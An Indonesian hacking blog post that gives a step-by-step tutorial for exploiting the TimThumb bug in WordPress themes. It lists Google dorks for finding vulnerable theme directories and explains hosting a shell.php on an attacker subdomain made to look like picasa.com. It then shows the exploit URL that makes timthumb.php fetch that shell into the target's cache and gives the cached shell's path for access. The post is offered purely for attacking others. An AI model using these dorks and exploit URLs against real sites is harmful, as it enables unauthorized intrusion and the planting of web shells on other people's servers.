Selamat malam sahabat Cyber.Apa itu Tim-thumb Exploit WordPress....Tim-thumb Exploit WordPress adalah teknik hacking yang dapat dilakukan dengan memanfaatkan bug pada Timthumb.php atau thumb.php
Bahan - Bahan :
- Modem
- PC
- Otak
- Subdomain picasa.com.webkamu.org( yang sudah di beri bumbu )
Langkah - Langkah :
1. Meluncur Ke google Gunakan Dork Berikut
inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/
USE YOUR BRAIN =))
2. Setelah menemukan target coba tambahkan timthumb.php
~> http://site/wp-content/themes/eStore/timthumb.php
3.Buat Subdomain di cpanel kamu ato di hosting picasa.com.websitekamu.org disini saya tidak akan menjelaskan cara membuat subdomain pasti semua udh pada bisa xD
4.Setelah Membuat subdomain Uplod shell di subdomain tadi sehingga menjadi
~> picasa.com/websitekamu.org/shell.php
5.Setelah Selesai Semua Langsung Di eksekusi Web Tadi Dengan Cara
~> http://site/wp-content/themes/eStore/timthumb.php?src= picasa.com/websitekamu.org/shell.php
6.Jika Keluar Seperti Gambar Ini Berarti Succes
7.Langsung Saja Buka Shellnya dgn cara
~> http://site/wp-content/themes/eStore/cache/md5_tadi.php
~> http://site/wp-content/themes/eStore/cache/b3e7dbdafde738b6e31c1d0b7fb93948.php
Jangan Lupa Follow ya blogg cupu saya.Bila kurang paham tinggalkan jejek anda.trimakasih
source:http://gcyberattacker.blogspot.com
